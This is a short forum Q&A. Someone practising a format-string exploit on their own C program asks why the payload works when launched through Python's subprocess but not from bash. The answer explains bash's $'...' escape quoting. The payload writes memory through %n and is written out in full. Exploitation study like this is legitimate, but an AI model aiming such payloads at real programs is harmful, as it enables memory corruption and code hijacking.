I've got a string/argument that I'd like to pass to a C program. It's a string format exploit.
'\xb2\x33\02\x08x%2$n'
However, there seems to be different behaviours exhibited if I call the C program from Python by doing
subprocess.Popen(["env", "-i", "./practice", '\xb2\x33\02\x08x%2$n'])
versus
./practice '\xb2\x33\02\x08x%2$n'
The difference is that the string exploit attack works as expected when calling the script via subprocess, but not when I call it through the CLI.
What might the reason be? Thanks.
CodePudding user response:
Bash manpage says:
Words of the form $'string' are treated specially. The word expands to string, with backslash-escaped characters replaced as specified by the ANSI C standard. Backslash escape sequences, if present, are decoded as follows: [snipped]
\xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits)
Then would you please try:
./practice $'\xb2\x33\02\x08x%2$n'